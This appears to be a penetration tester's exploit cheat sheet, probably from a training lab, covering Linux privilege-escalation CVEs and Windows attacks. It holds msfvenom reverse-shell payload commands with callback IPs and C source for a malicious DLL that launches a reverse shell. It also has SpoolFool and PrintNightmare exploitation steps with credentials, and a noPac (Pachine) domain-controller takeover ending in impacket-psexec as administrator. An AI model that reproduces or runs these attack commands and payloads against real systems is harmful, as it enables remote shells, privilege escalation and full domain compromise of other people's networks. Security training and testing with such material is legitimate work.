Exploits
Linux
CVE-2021-4034 - Polkit (pkexec)
CVE-2009-2698 - CentOS kernel before 2.6.19
CVE-2012-0056 - Mempodipper
Windows
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.220 LPORT=4444 -f exe -o rev.exe
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.49.164 LPORT=3333 -f dll -o evil.dll
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Wrapper DLL: when loaded into a process, it launches the staged rev.exe
   via cmd.exe and then terminates the host process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k c:\\Users\\alice\\Music\\rev.exe");
        ExitProcess(0);
    }
    return TRUE;
}
x86_64-w64-mingw32-gcc evildll.c -shared -o reverse.dll
1. Upload rev.exe, reverse.dll and SpoolFool.ps1 to the target.
2. Start a netcat listener on port 4444.
3. Run the exploit:
. .\SpoolFool.ps1
Invoke-SpoolFool -dll reverse.dll
Check:
python3 printnightmare.py -check 'alice:ThisIsTheUsersPassword01@10.11.1.22'
Exploit:
python3 printnightmare.py -dll 'c:\Users\alice\Music\reverse.dll' 'alice:ThisIsTheUsersPassword01@10.11.1.22'
python3 pachine.py -dc-host xor-dc01.xor.com -scan 'xor.com/daisy:XorPasswordIsDead17'
python3 pachine.py -dc-host xor-dc01.xor.com -spn krbtgt/xor-dc01.xor.com -impersonate administrator 'xor.com/daisy:XorPasswordIsDead17'
export KRB5CCNAME=$PWD/administrator@xor.com.ccache
klist
impacket-psexec -k -no-pass 'xor.com/administrator@xor-dc01.xor.com'
JuicyPotato - Impersonate privilege
PrintSpoofer - Impersonate privilege, Windows 2019
TaskSchedPE - Vista/Win7/2008 x86/x64 - cscript 15589.wsf